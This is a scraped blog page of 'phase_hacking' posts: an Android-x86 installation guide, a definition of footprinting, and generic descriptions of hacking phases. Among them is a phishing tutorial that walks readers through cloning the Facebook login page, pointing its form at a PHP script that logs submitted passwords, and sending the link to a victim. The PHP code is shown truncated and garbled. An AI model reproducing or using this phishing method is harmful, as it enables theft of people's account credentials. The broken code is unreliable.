FN SECURE: phase_hacking

Call Us For Workshops Or Seminars.. In Your University, Colleges, or Schools.
Email Us At : vicky@globallyunique.in

Save as PDF
Showing posts with label phase_hacking. Show all posts
Showing posts with label phase_hacking. Show all posts

Install and Run ANDROID 4.0.4 (ICE CREAM SANDWICH) on your PC or Laptop directly or on VMWARE or VIRTUAL BOX


Good Morning Everyone,
Today we will learn here how to install and run Android 4.0.4 Ice Cream Sandwich on your PC directly and in VmWare or VirtualBox.
Now you can create and check and make use of android apps directly on your PC and theirs no need to be dependent on a android Phone or a tablet to become and Android hacker or app developer.Howdy, for all the Android developers.
Android,the google’s OS for phones/tablet PC is a Linux based OS basically designed for ARM CPU, but it has also been ported for x86 architecture i.e. Intel/AMD CPU by Chih-Wei Huang. This project is called
Android-x86, you can visit www.android-x86.org or www.androidx86.org for more information. So, we’ii now install Android x86 4 (Ice cream Sandwich) on our PC.You can also install the pre-android versions also. I’m doing it in VmWare but you can also install Android directly on your computer.
STEP 1:Dowmload
Go to wandroid-x86 download page and download the ISO image of your choice, I’ve downloaded the IBM think pad installer,no special reason just that its largest one…
 STEP 2:VmWare Setup
You have to change your virtual disk type to be IDE because the default type in VMware is SCSI, and Android-x86 kernel is not configured to support SCSI. You can follow these steps:
  • Create a virtual machine.
  • Edit virtual machine settings after the virtual machine created.
  • Choose the hard disk and remove it.
  • Add a hard disk to create a new virtual disk, then you can choose IDE as your virtual disk type.
  • When finished, you can install android-x86 normally.
Note: For normal functioning,select:
  • Ram : 1024Mb
  • Memory : 4Gb
  • OS:Linux
  • Use advanced method and not typical(or default) and select IDE hard disk
STEP 3:Setup Android x86
You can follow the images to install android 4.04
Bootup your OS by selecting it in Workstation

Android-x86 Live & Installation CD 4.0-RC2 GRUB Menu select ‘Installation – Install Android-x86 to harddisk’ using Keyboard and you will be asked to partion the drive.

Then create a new partition in the free space.
Also mark the drive as ‘Bootable’ by hitting Enter on it and you will be given with this warning(‘Are You Shure’ type)…
Write ‘yes’ and then hit Enter, after writing the filesytem
Then hit QUIT botton
Android-x86 can co-exist with other operating system or data in the chosen partition. If the partition is formatted, you may choose ‘Do not format’ to keep existing data. Otherwise, choose a filesystem type to format. Note the type you chosen must match the partition id, or the boot loader will fail to boot.
Also note if you choose to format to fat32, you will see a warning that android cannot save data to fat32. You can still proceed to install, but the installed android system will work like a live cd system. That is, all data will lose after power off. Therefore we do not recommend to install Android-x86 to a fat32 partition.
Now installer will display a warning, just type Yes to format the harddisk.
If you are lucky, the installation will begin, and you will see the progress bar.
If you see this screen, the installation is complete. Congratulations! Now you can run Andrond-x86 directly, or you can reboot and run it.
Now the OS will boot from the harddisk and then it will display the Welcome screen for Android
These are just followup Screenshots that I took

Here is the final video:

Advanced

How to create a bootable USB stick for Android-x86?

  • Use the USB image
    Download the compressed USB image, uncompress and dump it to a USB stick. On a Linux host, you can use the command
    # zcat android-x86-1.6-r2_usb.img.gz | dd of=/dev/sdc
    where /dev/sdc is the device name of the target USB disk. However, some broken BIOS may fail to boot such a USB disk.
  • Create a bootable USB stick by iso
    There are some open source tools that can convert an iso into a bootable USB disk, say

Multi-boot

To boot other operating systems, you have to add items for them to /grub/menu.lst. For example, to boot Windows, add the following:
title Windows
    rootnoverify (hd0,0)
    chainloader +1
This assumes the Windows is installed to the first partition of the first hard disk. Or you need to change rootnoverify to the appropriate value. See Grub manual for details.

Read more

Phising and how to reverse phising tut ...


Phising and method to RevErse Phising...


Today i will teach You HOw TO CreAte A pHising Page And HOW TO RevErsE It ... :)
For Phising :
1 . Get H0sting at www.ripway.com
2 . Create index File By GOing to www.facebook.com/login.php and press ctrl+u and then ctrl+f and search for action...
3. You Will GEt AcTion In yellow heading ,, Now ChanGe THe ActiON To lOgs.php... Like action="logs.php"
4.Copy AlL souRce ANd PAste iT In THe THe CreATe INdex ON ripway.com...
5.Then creat text file and paste dis source there....the source is given below....


$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

6. save File ...
And UR FAke PAge IS CreAted ... Give The LInk iNdex.html to The VicTim ANd GEt PAsses in logs.txt...




N0w MEthODs TO RevErsE PHising ...

SOme ONe HAs GIven U A PhisinG Link Like ... h1.ripway.com/muneeb3/index.html now to Reverse it u need to change the url into h1.ripway.com/muneeb3/logs.txt .... ANd u wiLL GEt ALL the PAsseS gIven ...

Read more

What is Footprinting?

Defining Foot printing

    *

      Foot printing is the blueprinting of the security profile of an organization, undertaken in a methodological manner.
    *

      Foot printing is one of the three pre-attack phases. The others are scanning and enumeration.
    *

      Foot printing results in a unique organization profile with respect to networks (Internet / Intranet / Extra net / Wireless) and systems involved.

      There is no single methodology for foot printing, as a hacker can choose several routes to trace the information. Foot printing therefore, needs to be carried out precisely and in an organized manner. The information unveiled at various network levels can include details of domain name, network blocks, network services and applications, system architecture, intrusion detection systems, specific IP addresses, access control mechanisms and related lists, phone numbers, contact addresses, authentication mechanisms and system enumeration.

      The information gathering activity can be broadly divided into seven phases: 

          o The attacker would first unearth initial information (such as domain name), 

          o locate the network range of the target system (using tools such as Nslookup, whois etc),

          o  ascertain the active machines (for instance by pinging the machine), 

          o discover open ports or access points (using tools such as port scanners), 

          o detect operating systems (for instance querying with telnet), 

          o uncover services on ports and 

          o ultimately map the network.

      This not only speeds up the real attack process, but also aids in helping the attacker prepare better for covering his tracks and thereby leave a smaller or minimal footprint.

      Initial Information:

      Commonly includes:
          o

            Domain name lookup
          o

            Locations
          o

            Contacts (Telephone / mail)

      Information Sources:
          o

            Open source
          o

            Who is
          o

            Nslookup

      Hacking Tool:
          o

            Sam Spade

            Open Source Foot printing is the easiest and safest way to go about finding information about a company. Information that is available to the public, such as phone numbers, addresses, etc. Performing whois requests, searching through DNS tables are other forms of open source foot printing. Most of this information is fairly easy to get, and within legal limits. One easy way to check for sensitive information is to check the HTML source code of the website to look for links, comments, Meta tags etc

Read more

Hacking Phase 5 - Covering Tracks


Phase 5 - Covering Tracks

*

Covering Tracks refers to the activities undertaken by the hacker to extend his misuse of the system without being detected.
*

Reasons include need for prolonged stay, continued use of resources, removing evidence of hacking, avoiding legal action etc.
*

Examples include Steganography, tunneling, altering log files etc.
*

Hackers can remain undetected for long periods or use this phase to start a fresh reconnaissance to a related target system.

Read more

Hacking Phase 4 - Maintaining Access

Phase 4 - Maintaining Access

*

Maintaining Access refers to the phase when the hacker tries to retain his 'ownership' of the system.
*

The hacker has exploited a vulnerability and can tamper and compromise the system.
*

Sometimes, hackers harden the system from other hackers as well (to own the system) by securing their exclusive access with Backdoors, RootKits, Trojans and Trojan horse Backdoors.
*

Hackers can upload, download or manipulate data / applications / configurations on the 'owned' system.

Read more

Hacking Phase 3 - Gaining Access - The hacker exploits the system

Phase 3 - Gaining Access

*

Gaining Access refers to the true attack phase. The hacker exploits the system.
*

The exploit can occur over a LAN, locally, Internet, offline, as a deception or theft. Examples include stack-based buffer overflows, denial of service, session hijacking, password filtering etc.
*

Influencing factors include architecture and configuration of target system, skill level of the perpetrator and initial level of access obtained.
*

Business Risk - 'Highest' - The hacker can gain access at operating system level, application level or network level.

Read more

Hacking Phase 3 - Gaining Access - The hacker exploits the system

Phase 3 - Gaining Access

*

Gaining Access refers to the true attack phase. The hacker exploits the system.
*

The exploit can occur over a LAN, locally, Internet, offline, as a deception or theft. Examples include stack-based buffer overflows, denial of service, session hijacking, password filtering etc.
*

Influencing factors include architecture and configuration of target system, skill level of the perpetrator and initial level of access obtained.
*

Business Risk - 'Highest' - The hacker can gain access at operating system level, application level or network level.

Read more

Hacking Phase 2 - Scanning

Phase 2 - Scanning

    *

      Scanning refers to pre-attack phase when the hacker scans the network with specific information gathered during reconnaissance.
    *

      Business Risk - 'High' - Hackers have to get a single point of entry to launch an attack and could be point of exploit when vulnerability of the system is detected.
    *

      Scanning can include use of dialers, port scanners, network mapping, sweeping, vulnerability scanners etc.

Read more

Hacking Phase 1 - Reconnaissance

    *      Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack. It involves network scanning either external or internal without authorization    *

      Business Risk - To see if someone is watching and responding. Could be future point of return when noted for ease of entry for an attack when more is known on a broad scale about the target.
    *

      Passive reconnaissance involves monitoring network data for patterns and clues.
          o

            Examples include sniffing, information gathering etc.
    *

      Active reconnaissance involves probing the network to detect
          o

            accessible hosts
          o

            open ports
          o

            location of routers
          o

            details of operating systems and services

Read more

Save this Page

Download as PDF